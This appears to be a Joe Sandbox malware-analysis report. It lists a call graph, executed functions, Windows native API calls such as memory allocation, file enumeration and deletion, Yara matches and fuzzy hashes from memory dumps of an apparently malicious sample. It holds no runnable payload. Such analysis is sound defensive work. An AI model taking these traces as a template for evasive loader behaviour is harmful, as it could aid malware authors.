2e09ae2 85963->85966 85964 2e09f76 85964->85964 85966->85964 85967 2e299d0 85966->85967 85968 2e29a19 85967->85968 85973 2e04020 85968->85973 85970 2e29a25 85971 2e29a53 85970->85971 85976 2e24490 85970->85976 85971->85964 85980 2e12fb0 85973->85980 85975 2e0402d 85975->85970 85977 2e244ea 85976->85977 85979 2e244f7 85977->85979 85991 2e11460 85977->85991 85979->85971 85981 2e12fc7 85980->85981 85983 2e12fe0 85981->85983 85984 2e28890 85981->85984 85983->85975 85986 2e288a8 85984->85986 85985 2e288cc 85985->85983 85986->85985 85987 2e274d0 LdrInitializeThunk 85986->85987 85988 2e28921 85987->85988 85989 2e29d80 RtlFreeHeap 85988->85989 85990 2e28937 85989->85990 85990->85983 85992 2e1149b 85991->85992 86007 2e176f0 85992->86007 85994 2e114a3 85995 2e29e60 RtlAllocateHeap 85994->85995 86006 2e1176f 85994->86006 85996 2e114b9 85995->85996 85997 2e29e60 RtlAllocateHeap 85996->85997 85998 2e114ca 85997->85998 85999 2e29e60 RtlAllocateHeap 85998->85999 86001 2e114db 85999->86001 86002 2e1156e 86001->86002 86018 2e16500 86001->86018 86003 2e14280 LdrLoadDll 86002->86003 86004 2e1172f 86003->86004 86041 2e26bb0 86004->86041 86006->85979 86008 2e1771c 86007->86008 86009 2e175e0 2 API calls 86008->86009 86010 2e1773f 86009->86010 86011 2e17761 86010->86011 86012 2e17749 86010->86012 86014 2e1777d 86011->86014 86016 2e27e40 NtClose 86011->86016 86013 2e17754 86012->86013 86015 2e27e40 NtClose 86012->86015 86013->85994 86014->85994 86015->86013 86017 2e17773 86016->86017 86017->85994 86019 2e16525 86018->86019 86020 2e15da0 2 API calls 86019->86020 86022 2e16556 86019->86022 86020->86022 86021 2e16673 86021->86002 86022->86021 86023 2e16030 3 API calls 86022->86023 86025 2e165ec 86023->86025 86024 2e165f7 86024->86002 86025->86024 86026 2e15eb0 LdrInitializeThunk 86025->86026 86027 2e166aa 86026->86027 86028 2e1675f 86027->86028 86030 2e27e40 NtClose 86027->86030 86029 2e16030 3 API calls 86028->86029 86031 2e16775 86029->86031 86035 2e166bf 86030->86035 86032 2e16200 4 API calls 86031->86032 86034 2e1677c 86031->86034 86033 2e167b9 86032->86033 86033->86002 86034->86002 86036 2e15eb0 LdrInitializeThunk 86035->86036 86037 2e1670a 86036->86037 86038 2e27e40 NtClose 86037->86038 86039 2e16714 86038->86039 86040 2e15eb0 LdrInitializeThunk 86039->86040 86040->86028 86042 2e26c0a 86041->86042 86044 2e26c17 86042->86044 86045 2e11780 86042->86045 86044->86006 86061 2e179c0 86045->86061 86047 2e11c88 86047->86044 86048 2e117a0 86048->86047 86065 2e20610 86048->86065 86051 2e119a1 86053 2e2af90 2 API calls 86051->86053 86052 2e117fe 86052->86047 86068 2e2ae60 86052->86068 86055 2e119b6 86053->86055 86054 2e17960 LdrInitializeThunk 86056 2e119e1 86054->86056 86055->86056 86073 2e10420 86055->86073 86056->86047 86056->86054 86058 2e10420 LdrInitializeThunk 86056->86058 86058->86056 86059 2e11b0f 86059->86056 86060 2e17960 LdrInitializeThunk 86059->86060 86060->86059 86062 2e179cd 86061->86062 86063 2e179f5 86062->86063 86064 2e179ee SetErrorMode 86062->86064 86063->86048 86064->86063 86066 2e29cf0 NtAllocateVirtualMemory 86065->86066 86067 2e20631 86066->86067 86067->86052 86069 2e2ae70 86068->86069 86070 2e2ae76 86068->86070 86069->86051 86071 2e29e60 RtlAllocateHeap 86070->86071 86072 2e2ae9c 86071->86072 86072->86051 86074 2e1042c 86073->86074 86077 2e280b0 86074->86077 86078 2e280cd 86077->86078 86081 35b2c70 LdrInitializeThunk 86078->86081 86079 2e10442 86079->86059 86081->86079 85678 2e1f650 85679 2e1f66d 85678->85679 85680 2e14280 LdrLoadDll 85679->85680 85681 2e1f68b 85680->85681 85682 2e16850 85683 2e1687a 85682->85683 85686 2e17790 85683->85686 85685 2e168a4 85687 2e177ad 85686->85687 85693 2e275c0 85687->85693 85689 2e17804 85689->85685 85690 2e177fd 85690->85689 85691 2e27690 LdrInitializeThunk 85690->85691 85692 2e1782d 85691->85692 85692->85685 85694 2e2764d 85693->85694 85695 2e275e1 85693->85695 85698 35b2f30 LdrInitializeThunk 85694->85698 85695->85690 85696 2e27686 85696->85690 85698->85696 85699 2e27cd0 85700 2e27cf1 85699->85700 85701 2e27d69 85699->85701 85702 2e27d7f NtReadFile 85701->85702 85703 2e24e50 85704 2e24eaa 85703->85704 85706 2e24eb7 85704->85706 85707 2e229d0 85704->85707 85714 2e29cf0 85707->85714 85709 2e22a11 85710 2e14280 LdrLoadDll 85709->85710 85712 2e22b16 85709->85712 85713 2e22a57 85710->85713 85711 2e22a90 Sleep 85711->85713 85712->85706 85713->85711 85713->85712 85717 2e27f90 85714->85717 85716 2e29d21 85716->85709 85718 2e2801a 85717->85718 85720 2e27fb4 85717->85720 85719 2e28030 NtAllocateVirtualMemory 85718->85719 85719->85716 85720->85716 85721 2e20c50 85722 2e20c6c 85721->85722 85723 2e20c94 85722->85723 85724 2e20ca8 85722->85724 85725 2e27e40 NtClose 85723->85725 85726 2e27e40 NtClose 85724->85726 85727 2e20c9d 85725->85727 85728 2e20cb1 85726->85728 85731 2e29ea0 RtlAllocateHeap 85728->85731 85730 2e20cbc 85731->85730 86082 2e1941b 86083 2e1942a 86082->86083 86084 2e19431 86083->86084 86085 2e29d80 RtlFreeHeap 86083->86085 86085->86084 86086 2e1251c 86087 2e15da0 2 API calls 86086->86087 86088 2e12553 86087->86088

                                              Executed Functions

                                              Function 02E09710 Relevance: 31.7, Strings: 25, Instructions: 409COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 26 2e09710-2e09ae0 27 2e09af1-2e09afa 26->27 28 2e09b10-2e09b17 27->28 29 2e09afc-2e09b0e 27->29 31 2e09b19-2e09b3c 28->31 32 2e09b3e-2e09b48 28->32 29->27 31->28 33 2e09b59-2e09b65 32->33 34 2e09b67-2e09b70 33->34 35 2e09b7d-2e09b87 33->35 36 2e09b72-2e09b78 34->36 37 2e09b7b 34->37 38 2e09b98-2e09ba1 35->38 36->37 37->33 40 2e09bb1-2e09bbb 38->40 41 2e09ba3-2e09baf 38->41 43 2e09bcc-2e09bd5 40->43 41->38 44 2e09bd7-2e09be9 43->44 45 2e09beb 43->45 44->43 47 2e09bf2-2e09c0b 45->47 47->47 48 2e09c0d-2e09c17 47->48 49 2e09c50-2e09c5f 48->49 50 2e09c19-2e09c34 48->50 53 2e09c66-2e09c6d 49->53 51 2e09c36-2e09c3a 50->51 52 2e09c3b-2e09c3d 50->52 51->52 54 2e09c4e 52->54 55 2e09c3f-2e09c48 52->55 56 2e09c96-2e09ca7 53->56 57 2e09c6f-2e09c80 53->57 54->48 55->54 58 2e09cb8-2e09cc4 56->58 59 2e09c82-2e09c86 57->59 60 2e09c87-2e09c89 57->60 63 2e09cc6-2e09cd5 58->63 64 2e09cd7-2e09cde 58->64 59->60 61 2e09c94 60->61 62 2e09c8b-2e09c91 60->62 61->53 62->61 63->58 66 2e09d10-2e09d19 64->66 67 2e09ce0-2e09d0e 64->67 68 2e09eee-2e09ef5 66->68 69 2e09d1f-2e09d32 66->69 67->64 70 2e09f76-2e09f8f 68->70 71 2e09ef7-2e09f01 68->71 72 2e09d43-2e09d4c 69->72 70->70 73 2e09f91-2e09f9b 70->73 74 2e09f12-2e09f1b 71->74 75 2e09d62-2e09d71 72->75 76 2e09d4e-2e09d60 72->76 77 2e09f31-2e09f41 74->77 78 2e09f1d-2e09f2f 74->78 80 2e09da0-2e09daa 75->80 81 2e09d73-2e09d7a 75->81 76->72 77->77 82 2e09f43-2e09f4c 77->82 78->74 85 2e09dac-2e09dcb 80->85 86 2e09dde-2e09de8 80->86 83 2e09d9b 81->83 84 2e09d7c-2e09d99 81->84 88 2e09f71 call 2e299d0 82->88 89 2e09f4e-2e09f6f 82->89 83->68 84->81 90 2e09ddc 85->90 91 2e09dcd-2e09dd6 85->91 92 2e09df9-2e09e05 86->92 88->70 89->82 90->80 91->90 94 2e09e16-2e09e1c 92->94 95 2e09e07-2e09e14 92->95 97 2e09e20-2e09e24 94->97 95->92 98 2e09e26-2e09e45 97->98 99 2e09e47-2e09e51 97->99 98->97 100 2e09e62-2e09e6b 99->100 101 2e09e83-2e09e8d 100->101 102 2e09e6d-2e09e76 100->102 105 2e09e9e-2e09ea7 101->105 103 2e09e81 102->103 104 2e09e78-2e09e7e 102->104 103->100 104->103 107 2e09ea9-2e09ebb 105->107 108 2e09ebd-2e09ec1 105->108 107->105 110 2e09ec3-2e09ee7 108->110 111 2e09ee9 108->111 110->108 111->66
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: ^$ ;{x+$ B$!:$$$$P$*N$+d$:($<C$AF$G$ID$I`$Pv$Xq$bI$fL$pj$t($zZ${:$+$F$H
                                              • API String ID: 0-2496873784
                                              • Opcode ID: 2991be7da0ba87dc2dda644dfd9ddd3e654dec9d71ef1ed8c54f2c04673343da
                                              • Instruction ID: 2cdba7c4f3ebdd6e480e3eeacde979b6d6e3a01a22c2ce84ef40dd3e1ef89a88
                                              • Opcode Fuzzy Hash: 2991be7da0ba87dc2dda644dfd9ddd3e654dec9d71ef1ed8c54f2c04673343da
                                              • Instruction Fuzzy Hash: 1632CCB0D45229CBEB24CF45C9987EDBBB2BB45308F1091D9D1496B282C7B91ECACF45
                                              Function 02E1BCA0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • FindFirstFileW.KERNELBASE(?,00000000), ref: 02E1BD84
                                              • FindNextFileW.KERNELBASE(?,00000010), ref: 02E1BDBF
                                              • FindClose.KERNELBASE(?), ref: 02E1BDCA
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Find$File$CloseFirstNext
                                              • String ID:
                                              • API String ID: 3541575487-0
                                              • Opcode ID: d2e3bf0895aad5277f26f29573e5470a2d773fe159bae29d1b260fb7a208acda
                                              • Instruction ID: 67f89ac10f540ee609eb16e91dc45e96829ba315ed0baa7375d5df3d9e1c5c4b
                                              • Opcode Fuzzy Hash: d2e3bf0895aad5277f26f29573e5470a2d773fe159bae29d1b260fb7a208acda
                                              • Instruction Fuzzy Hash: 31319271940248BBDB24DF60CC85FEF777D9F44709F14956CF909AB180EB70AA848BA0
                                              Function 02E27B70 Relevance: 1.6, APIs: 1, Instructions: 98filenativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 02E27C63
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 84d4dad2c4c3b1cef6bd09c59e1f8330804c3018dc16b04c2698d04254ef2634
                                              • Instruction ID: 13cdeac053b0c5704e911ec0331a5a6bb9ba1d5c0b0244d4638d42fd828172c0
                                              • Opcode Fuzzy Hash: 84d4dad2c4c3b1cef6bd09c59e1f8330804c3018dc16b04c2698d04254ef2634
                                              • Instruction Fuzzy Hash: 6631D2B5A40649AFCB14DF98D880EDEB7F9EF8C310F109219F919A7340D730A9528FA5
                                              Function 02E27CD0 Relevance: 1.6, APIs: 1, Instructions: 90filenativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?), ref: 02E27DA8
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 80dc1390ca48c5d0f25600eaeef4ad0bea618cfa619d8ab256df1233b53076ad
                                              • Instruction ID: da2ccee0c05406dc685649730425c863b9a87dd965d1310c0bc9ad8141920049
                                              • Opcode Fuzzy Hash: 80dc1390ca48c5d0f25600eaeef4ad0bea618cfa619d8ab256df1233b53076ad
                                              • Instruction Fuzzy Hash: 1431E4B5A40209AFCB14DF99D880EEFB7B9EF88314F108219FD19A7240D770A8518FA5
                                              Function 02E27F90 Relevance: 1.6, APIs: 1, Instructions: 78memorynativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(02E117FE,?,02E26C17,00000000,00000004,00003000,?,?,?,?,?,02E26C17,02E117FE,02E117FE,00000000,?), ref: 02E2804D
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: 5568dea4c8ca8698226094edc2721bef8e4aa1d4a805e2a82088953719428c6f
                                              • Instruction ID: 1317629060660874a2d34035816c1fafa872c12e33ad29d0190435fb292be681
                                              • Opcode Fuzzy Hash: 5568dea4c8ca8698226094edc2721bef8e4aa1d4a805e2a82088953719428c6f
                                              • Instruction Fuzzy Hash: 9A2119B1A40219AFDB14DF58DC81FAFB7AAEF88310F108109FD0997240D774A9558FA5
                                              Function 02E27DB0 Relevance: 1.6, APIs: 1, Instructions: 58filenativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: DeleteFile
                                              • String ID:
                                              • API String ID: 4033686569-0
                                              • Opcode ID: 4731d91a9ffcf5b7c1b94e2298f6f222d1c5d89d00eb63a1b6857847cc9146f5
                                              • Instruction ID: cf4a9523aaf28eff2b24d64a226f5115ae01ca639c3b92c4e7996aa010aa3d57
                                              • Opcode Fuzzy Hash: 4731d91a9ffcf5b7c1b94e2298f6f222d1c5d89d00eb63a1b6857847cc9146f5
                                              • Instruction Fuzzy Hash: 3F01D671A802147FD620EBA4DC41FEB77ADDF95310F409509FA09AB180D7B079158BF6
                                              Function 02E27E40 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02E27E77
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Close
                                              • String ID:
                                              • API String ID: 3535843008-0
                                              • Opcode ID: 834ca95e8c7c874dcc3c86e31a2b99fa2e957ab27539cd0c93db527c1b6d8bda
                                              • Instruction ID: e87c516452b793c77127674f4909dbcceb4a05c3de55165e34ab30723ccd7676
                                              • Opcode Fuzzy Hash: 834ca95e8c7c874dcc3c86e31a2b99fa2e957ab27539cd0c93db527c1b6d8bda
                                              • Instruction Fuzzy Hash: 64E086326802147BC250EB59DC41FDB776DDFC5750F518015FA0DAB141C67079058BF5
                                              Function 035B4340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 12c643422bfda1c469c4bc16a3cd8cd2e264ff3ecced52f5a1ed144b17abd920
                                              • Instruction ID: 15f54689a1a1f97bc5e425fe4e977db412489573f063ce1aece79b7193a9ceb4
                                              • Opcode Fuzzy Hash: 12c643422bfda1c469c4bc16a3cd8cd2e264ff3ecced52f5a1ed144b17abd920
                                              • Instruction Fuzzy Hash: CD900231715844169140B1995C845464045A7E0315B59C015E4424555C8B158A565361
                                              Function 035B3090 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 6a3d84575efd8eef4e040e1cc2ab24518ee3d0691589309735614eed575cf629
                                              • Instruction ID: c094eb64a70837c019e0f8e09c225d5f98dda8e873aad99c67e95855db6c3f5b
                                              • Opcode Fuzzy Hash: 6a3d84575efd8eef4e040e1cc2ab24518ee3d0691589309735614eed575cf629
                                              • Instruction Fuzzy Hash: 5990022135144C06D140B19998147070046D7D0615F59C015A4024555D87178A6566B1
                                              Function 035B4650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: ba811bde92358a880f2126f4e07b348a25d6d9661e9bc284900803261d479f33
                                              • Instruction ID: 2622393e066393462f9e06e929c9ed2af511349ad5cbf400df05482ba7d7c178
                                              • Opcode Fuzzy Hash: ba811bde92358a880f2126f4e07b348a25d6d9661e9bc284900803261d479f33
                                              • Instruction Fuzzy Hash: 3F900261711544464140B1995C044066045A7E1315399C119A4554561C871989559269
                                              Function 035B35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: fd7b478141cff144c59803082c66cec624639262393db393aa6f3d8e381914f3
                                              • Instruction ID: 3c189578d3a62392f983ff4bad9fbc30336bc0195558d054c6585f42f871b460
                                              • Opcode Fuzzy Hash: fd7b478141cff144c59803082c66cec624639262393db393aa6f3d8e381914f3
                                              • Instruction Fuzzy Hash: 8990023171554806D100B1995914706104597D0215F69C415A4424569D87968A5165A2
                                              Function 035B2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 133880a2fb727971d9f6f4e7b1d5ac36d24dc460e39be51918d0c481ab60eba6
                                              • Instruction ID: d0266a2a967eb804d730d2657169686374ad54084872fcd5d7388edefaab5ca3
                                              • Opcode Fuzzy Hash: 133880a2fb727971d9f6f4e7b1d5ac36d24dc460e39be51918d0c481ab60eba6
                                              • Instruction Fuzzy Hash: 4F900261312444074105B1995814616404A97E0215B59C025E5014591DC62689916125
                                              Function 035B2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: db7bc184cc1835393111f662719f9162669552a8983d69b15c0f5ff7c4725f74
                                              • Instruction ID: 4e1f79c8787e05ea289872fd2d983c67c2d7a7c8fe3a1676dea51098c64a9554
                                              • Opcode Fuzzy Hash: db7bc184cc1835393111f662719f9162669552a8983d69b15c0f5ff7c4725f74
                                              • Instruction Fuzzy Hash: 0990023131144C06D180B199580464A004597D1315F99C019A4025655DCB168B5977A1
                                              Function 035B2BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 8b3c0e21360da4cd5ca80926a4a5c4d6bdc87ee7d1ae1c16eb697ae2a6dcd08e
                                              • Instruction ID: b6d54a57a2ac7dc6362a4cff55aebe87581a8d538acf78cccf15ee38107ce2a1
                                              • Opcode Fuzzy Hash: 8b3c0e21360da4cd5ca80926a4a5c4d6bdc87ee7d1ae1c16eb697ae2a6dcd08e
                                              • Instruction Fuzzy Hash: 4A90023131548C46D140B1995804A46005597D0319F59C015A4064695D97268E55B661
                                              Function 035B2BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 4d4ecf44dacc8bbdca95ddc7b5340a863e8065e4d874a86f638e9d6ce3335588
                                              • Instruction ID: aabaeadc0ac12af8e6d3885538f4b0d647876799c81edcb117e4d4bf253ec4c9
                                              • Opcode Fuzzy Hash: 4d4ecf44dacc8bbdca95ddc7b5340a863e8065e4d874a86f638e9d6ce3335588
                                              • Instruction Fuzzy Hash: C590023171544C06D150B1995814746004597D0315F59C015A4024655D87568B5576A1
                                              Function 035B2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 2236917389ca3b39e1b4a13b946dd92618df8ba5d4f36325a98ff20a61a3d26f
                                              • Instruction ID: 76c22db9f4ceae7cc22ab6ee25b17f9799ef9fc74f807b000f9e71a5bfca2a55
                                              • Opcode Fuzzy Hash: 2236917389ca3b39e1b4a13b946dd92618df8ba5d4f36325a98ff20a61a3d26f
                                              • Instruction Fuzzy Hash: BE900225321444070105F5991B04507008697D5365359C025F5015551CD72289615121
                                              Function 035B2AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: e8a4870511d82742496e6e728d798f25eb85bbe4c985f46ab21875db9a925f42
                                              • Instruction ID: eb63ddb6008592e0cc09009a312768eae4b301fdb5b3434dc892828a3dd51957
                                              • Opcode Fuzzy Hash: e8a4870511d82742496e6e728d798f25eb85bbe4c985f46ab21875db9a925f42
                                              • Instruction Fuzzy Hash: FC900225331444060145F5991A0450B0485A7D6365399C019F5416591CC72289655321
                                              Function 035B39B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
